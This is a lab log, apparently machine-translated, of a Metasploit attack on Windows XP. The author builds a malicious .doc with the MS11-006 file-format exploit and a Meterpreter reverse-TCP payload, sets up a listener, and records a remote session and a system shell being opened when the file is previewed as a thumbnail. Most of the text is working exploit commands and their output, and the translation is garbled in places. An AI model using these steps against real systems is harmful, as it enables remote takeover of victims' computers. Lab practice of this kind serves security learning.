Environmental BT5R1
MSF > Use windows/fileformat/ms11_006_createsizeddibsection MSF Exploit (ms11_006_createsizeddibsection) > set Payload WINDOWS/METERPRETER/REVERSE_TCP payload = windows/meterpreter/reverse_tcp MSF exploit (ms11_006_ Createsizeddibsection) > Set lhost 192.168.1.11 lhost = 192.168.1.11 MSF exploit (ms11_006_createsizeddibsection) > Set lport 443 lport = 443 MSF exploit (ms11_006_createsizeddibsection) > Set Outputpath/opt/framework/msf3/da Ta/exploits/outputpath =/opt/framework/msf3/data/exploits/msf Exploit (ms11_006_createsizeddibsection) > Show Options Module Options (exploit/windows/fileformat/ms11_006_createsizeddibsection): Name current Setting Required Description--------------------------------------FILE
Name Msf.doc yes the file name.
Outputpath/opt/framework/msf3/data/exploits/yes the output path to use. Payload Options (WINDOWS/METERPRETER/REVERSE_TCP): Name current Setting Required Description------------------------ --------------exitfunc seh yes Exit Technique:seh, thread, process, none Lhost 192.168.1 . One yes the Listen address Lport 443 Yes the listen port Exploit target:id Nam E------0 Automatic MSF exploit (ms11_006_createsizeddibsection) > exploit [*] Creating ' msf.doc ' file:
. [*] Generated output File/opt/framework/msf3/data/exploits/msf.doc MSF exploit (ms11_006_createsizeddibsection) > use Multi/handler MSF exploit (handler) > Set payload windows/meterpreter/reverse_tcp payload = windows/meterpreter/ Reverse_tcp MSF exploit (handler) > Set lhost 192.168.1.11 lhost = 192.168.1.11 MSF exploit (handler) > Set Lpor
T 443 lport = 443 MSF exploit (handler) > exploit-j [*] exploit running as background job. [*] Started Reverse Handler on 192.168.1.11:443
[*] Starting the payload handler ... MSF exploit (handler) > Sessions-l active Sessions =============== No active session S. MSF exploit (handler) >
Copy the Msf.doc into XP, start, double click, BT5 not respond.
Later, I use thumbnails to view, do not need to double-click Msf.doc,bt5 to have a reaction (the book said to open the document, estimated error).
MSF exploit (handler) > [*] Sending stage (752128 bytes) to 192.168.1.143 [*] Meterpreter Session 1 opened (192.168.1. 11:443-192.168.1.143:1099) at 2013-05-14 19:32:47-0400 MSF exploit (handler) > sessions-l Active sessions = = = ============ Id Type Information Connection------ ---------------------1 meterpreter x86/win32 Root-4556186478\adminis Trator @ ROOT-4556186478 192.168.1.11:443-192.168.1.143:1099 MSF exploit (handler) > Sessions-i 1 [*] Starting
Interaction with 1 ...
Meterpreter > ls listing:c:\documents and Settings\Administrator ================================================ Mode Size Type Last modified Name-------------------------
----40777/rwxrwxrwx 0 dir 2013-05-14 10:20:44-0400. 40777/rwxrwxrwx 0 dir 2013-05-14 10:20:43-0400 .. 40555/r-xr-xr-x 0 dir 2013-05-14 10:21:13-0400 application Data 40777/rwxrwxrwx 0 dir 2013-05-14 10: 14:40-0400 Cookies 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 Desktop 40555/r-xr-xr-x 0 dir 20 13-05-14 10:21:21-0400 Favorites 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 Local Settings 40555/R-XR-XR -X 0 dir 2013-05-14 10:21:22-0400 My Documents 100666/rw-rw-rw-786432 fil 2013-05-14 11:30:17-0400 ntus ER. DAT 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 nethood 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 printhood 40555/r-xr-xr-x 0 dir 2013-05-14 11:30:35-0400 recent 40555/r-xr-xr-x 0 dir 2013-0 5-14 10:21:02-0400 SendTo 40555/r-xr-xr-x 0 dir 2013-05-14 17:51:30-0400 Start Menu 40777/rwxrwxrwx 0 Dir 2013-05-14 10:10:10-0400 Templates 100666/rw-rw-rw-1024 fil 2013-05-14 11:32:49-0400 Ntuser.dat.LOG 100 666/rw-rw-rw-1Fil 2013-05-14 10:23:33-0400 ntuser.ini meterpreter > SysInfo computer:root-4556186478 OS
: Windows XP (Build 2600, Service Pack 3).
Architecture:x86 System language:en_us meterpreter:x86/win32 Meterpreter > Shell Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator>
If you switch to the Simplified Chinese version of XP and view it with thumbnails, you will fail to get the shell.